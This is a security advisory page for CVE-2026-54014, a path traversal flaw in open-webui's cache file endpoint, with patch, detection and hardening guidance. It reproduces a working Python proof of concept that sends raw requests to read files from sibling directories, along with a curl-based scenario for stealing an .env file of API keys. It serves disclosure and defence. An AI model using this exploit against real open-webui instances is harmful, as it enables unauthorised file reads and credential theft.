AI Threat Alert
Open-webui's cache file serving endpoint contains a path traversal flaw where a missing trailing path separator in the `startswith` security check allows any authenticated user to read files from sibling directories whose names begin with 'cache' (e.g., `cache_backup`, `cached_models`). Exploitation requires only a valid low-privilege user account and a raw HTTP client — browsers normalize the traversal automatically, but curl with `--path-as-is` or direct ASGI delivers it unchanged, making this accessible to any motivated insider or holder of a compromised credential. The EPSS top-88th-percentile ranking and this package's history of 102 prior CVEs signal chronic security debt and elevated scanning attention; while not yet in CISA KEV, automated tools will index this quickly. Upgrade to open-webui 0.9.6 immediately and audit all directories adjacent to CACHE_DIR for any sensitive files that may share a 'cache' prefix naming convention.
What is the risk?
CVSS 4.3 (Medium) understates contextual risk in AI deployments where open-webui frequently co-locates with sensitive adjacent directories — API key stores, model configuration snapshots, and credential caches — that may carry a 'cache' prefix by naming convention or ops habit. Exploitation requires authentication (any user role) and raw HTTP delivery, ruling out unauthenticated mass exploitation, but insider threat and compromised-credential scenarios are plausible and realistic. The package's 102 prior CVEs and top-88th-percentile EPSS compound residual risk beyond what the base score reflects.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Open WebUI | pip | <= 0.9.5 | 0.9.6 |
Do you use Open WebUI? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
Patch: Upgrade open-webui to 0.9.6 (one-character fix —
os.sepappended to startswith prefix). -
Workaround pending patch: Audit and relocate any sensitive files from directories sibling to CACHE_DIR whose names begin with 'cache'.
-
Detection: Grep web server access logs for GET /cache/../ sequences; raw HTTP clients leave unnormalized paths, unlike browser traffic.
-
Hardening: Run open-webui under a service account with filesystem access scoped strictly to its required directories — no read access to adjacent paths.
-
Validate fix: Apply PoC (poc.py from advisory) against your instance before and after patch to confirm remediation.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-54014?
Open-webui's cache file serving endpoint contains a path traversal flaw where a missing trailing path separator in the `startswith` security check allows any authenticated user to read files from sibling directories whose names begin with 'cache' (e.g., `cache_backup`, `cached_models`). Exploitation requires only a valid low-privilege user account and a raw HTTP client — browsers normalize the traversal automatically, but curl with `--path-as-is` or direct ASGI delivers it unchanged, making this accessible to any motivated insider or holder of a compromised credential. The EPSS top-88th-percentile ranking and this package's history of 102 prior CVEs signal chronic security debt and elevated scanning attention; while not yet in CISA KEV, automated tools will index this quickly. Upgrade to open-webui 0.9.6 immediately and audit all directories adjacent to CACHE_DIR for any sensitive files that may share a 'cache' prefix naming convention.
Is CVE-2026-54014 actively exploited?
No confirmed active exploitation of CVE-2026-54014 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-54014?
1. Patch: Upgrade open-webui to 0.9.6 (one-character fix — `os.sep` appended to startswith prefix). 2. Workaround pending patch: Audit and relocate any sensitive files from directories sibling to CACHE_DIR whose names begin with 'cache'. 3. Detection: Grep web server access logs for GET /cache/../ sequences; raw HTTP clients leave unnormalized paths, unlike browser traffic. 4. Hardening: Run open-webui under a service account with filesystem access scoped strictly to its required directories — no read access to adjacent paths. 5. Validate fix: Apply PoC (poc.py from advisory) against your instance before and after patch to confirm remediation.
What systems are affected by CVE-2026-54014?
This vulnerability affects the following AI/ML architecture patterns: LLM chat interfaces, local model serving deployments, AI inference frontends, ML UI platforms.
What is the CVSS score for CVE-2026-54014?
CVE-2026-54014 has a CVSS v3.1 base score of 4.3 (MEDIUM). The EPSS exploitation probability is 0.04%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0025 Exfiltration via Cyber Means AML.T0037 Data from Local System AML.T0049 Exploit Public-Facing Application Compliance Controls Affected
What are the technical details?
Original Advisory
## Summary A path traversal vulnerability exists in open-webui's cache file serving endpoint that allows any authenticated user to read files from sibling directories outside the intended cache directory, by exploiting an incomplete `startswith` containment check that lacks a trailing path separator. The root cause is that `serve_cache_file()` in `open_webui/main.py` validates the resolved path with `file_path.startswith(os.path.abspath(CACHE_DIR))` — without appending `os.sep`. This allows any path resolving to a sibling directory whose name begins with `cache` (e.g. `cache_sibling`, `cache_backup`, `cached_models`) to pass validation. Deep traversal and absolute paths are correctly blocked. The bypass is narrow but confirmed — limited to sibling-prefix directories. ### Exploitation constraints | Constraint | Detail | |---|---| | Auth required | `get_verified_user` — any user with role `user` or `admin` | | Scope | Only sibling directories starting with `cache` (e.g. `cache_backup`, `cached_models`) | | Deep traversal | Blocked — `../../etc/passwd` correctly fails the startswith check | | Absolute paths | Blocked — `/etc/passwd` correctly fails | | Client normalization | httpx/browsers normalize `..` client-side — must use raw HTTP or ASGI to deliver payload | ## Vulnerability Details ### Vulnerable function: `serve_cache_file()` ```python # open_webui/main.py, line 2907-2924 @app.get('/cache/{path:path}') async def serve_cache_file(path: str, user=Depends(get_verified_user)): file_path = os.path.abspath(os.path.join(CACHE_DIR, path)) # prevent path traversal if not file_path.startswith(os.path.abspath(CACHE_DIR)): # ← BUG: no trailing os.sep raise HTTPException(status_code=404, detail='File not found') if not os.path.isfile(file_path): raise HTTPException(status_code=404, detail='File not found') return FileResponse(file_path, headers=headers) ``` ### The bypass ```python CACHE_DIR = "/data/cache" # Attacker path: "../cache_sibling/secret.txt" file_path = os.path.abspath(os.path.join("/data/cache", "../cache_sibling/secret.txt")) # → "/data/cache_sibling/secret.txt" "/data/cache_sibling/secret.txt".startswith("/data/cache") # → True ← BYPASS (because "cache_sibling" starts with "cache") # Correct check would be: "/data/cache_sibling/secret.txt".startswith("/data/cache/") # → False ← BLOCKED ``` ## Proof of Concept ### Environment | Component | Detail | |-----------|--------| | open-webui | 0.9.5 (pip installed) | | Python | 3.11 | | Import | `from open_webui.main import app` (true import, real FastAPI app) | | Method | Raw ASGI request (bypasses httpx client-side `..` normalization) | ### poc.py ```python import asyncio import os import shutil import sys import tempfile TEMP_DATA = tempfile.mkdtemp(prefix="owui_poc_") os.environ["DATA_DIR"] = TEMP_DATA os.environ["WEBUI_SECRET_KEY"] = "poc_secret_key_12345" os.environ["WEBUI_AUTH"] = "false" CACHE_DIR = os.path.join(TEMP_DATA, "cache") SIBLING_DIR = os.path.join(TEMP_DATA, "cache_sibling") os.makedirs(CACHE_DIR, exist_ok=True) os.makedirs(SIBLING_DIR, exist_ok=True) SECRET_CONTENT = "STOLEN_FROM_SIBLING_DIR" with open(os.path.join(SIBLING_DIR, "secret.txt"), "w") as f: f.write(SECRET_CONTENT) with open(os.path.join(CACHE_DIR, "legit.txt"), "w") as f: f.write("legitimate_cache_file") from open_webui.main import app from open_webui.utils.auth import get_verified_user class FakeUser: id = "poc" email = "poc@test" role = "user" app.dependency_overrides[get_verified_user] = lambda: FakeUser() async def raw_asgi_get(app, path): """Send a raw ASGI request without client-side path normalization.""" scope = { "type": "http", "method": "GET", "path": path, "query_string": b"", "headers": [(b"host", b"localhost")], "root_path": "", "asgi": {"version": "3.0"}, } response_started = False status_code = None body_parts = [] async def receive(): return {"type": "http.request", "body": b""} async def send(message): nonlocal response_started, status_code if message["type"] == "http.response.start": response_started = True status_code = message["status"] elif message["type"] == "http.response.body": body_parts.append(message.get("body", b"")) await app(scope, receive, send) return status_code, b"".join(body_parts) async def main(): s1, b1 = await raw_asgi_get(app, "/cache/legit.txt") s2, b2 = await raw_asgi_get(app, "/cache/../cache_sibling/secret.txt") s3, b3 = await raw_asgi_get(app, "/cache/../../etc/passwd") baseline_ok = s1 == 200 and b"legitimate_cache_file" in b1 exploit_ok = s2 == 200 and SECRET_CONTENT.encode() in b2 deep_blocked = s3 == 404 print(f"package: open_webui (pip installed)") print(f"version: 0.9.5") print(f"function: serve_cache_file (GET /cache/{{path}})") print(f"sink: main.py:2914 file_path.startswith(os.path.abspath(CACHE_DIR))") print(f"bypass: startswith without trailing os.sep allows sibling-prefix match") print() print(f"CACHE_DIR: {CACHE_DIR}") print(f"SIBLING: {SIBLING_DIR}") print() print(f"[baseline] /cache/legit.txt status={s1} body={b1[:40]!r}") print(f"[exploit] /cache/../cache_sibling/secret.txt status={s2} body={b2[:40]!r}") print(f"[control] /cache/../../etc/passwd status={s3} (should be 404)") print() print(f"result: {'VULNERABLE' if exploit_ok and baseline_ok and deep_blocked else 'NOT CONFIRMED'}") shutil.rmtree(TEMP_DATA, ignore_errors=True) sys.exit(0 if exploit_ok else 1) if __name__ == "__main__": asyncio.run(main()) ``` ### PoC output <img width="1392" height="288" alt="image" src="https://github.com/user-attachments/assets/2fbef163-9ef5-4ed5-aa53-a49bd9bf4713" /> ## Suggested Fix ```python if not file_path.startswith(os.path.abspath(CACHE_DIR) + os.sep): raise HTTPException(status_code=404, detail='File not found') ``` Single character fix: append `os.sep` to the prefix in the `startswith` check.
Exploitation Scenario
An adversary with a standard open-webui user account — obtained via self-registration, phishing, or credential stuffing — uses curl with `--path-as-is` to issue GET /cache/../cache_backup/config.json. The raw path bypasses client-side normalization, reaches the FastAPI handler, resolves to /data/cache_backup/config.json, and passes the flawed startswith check because 'cache_backup' begins with 'cache'. In a typical LLM serving deployment, a `cache_backup` directory created during a routine ops backup rotation may contain an `.env` snapshot with OpenAI or Anthropic API keys — giving the attacker direct access to the upstream model provider account used by the organization.
Weaknesses (CWE)
CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
- [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N References
Timeline
Related Vulnerabilities
CVE-2026-44551 9.1 open-webui: LDAP auth bypass — full account takeover
Same package: open-webui CVE-2026-45672 8.8 open-webui: code exec gate bypass via API endpoint
Same package: open-webui CVE-2026-44552 8.7 open-webui: Redis cache poisoning enables cross-instance tool hijack
Same package: open-webui CVE-2025-64495 8.7 Open WebUI: XSS-to-RCE via malicious prompt injection
Same package: open-webui CVE-2026-45315 8.7 open-webui: stored XSS → JWT theft and admin takeover
Same package: open-webui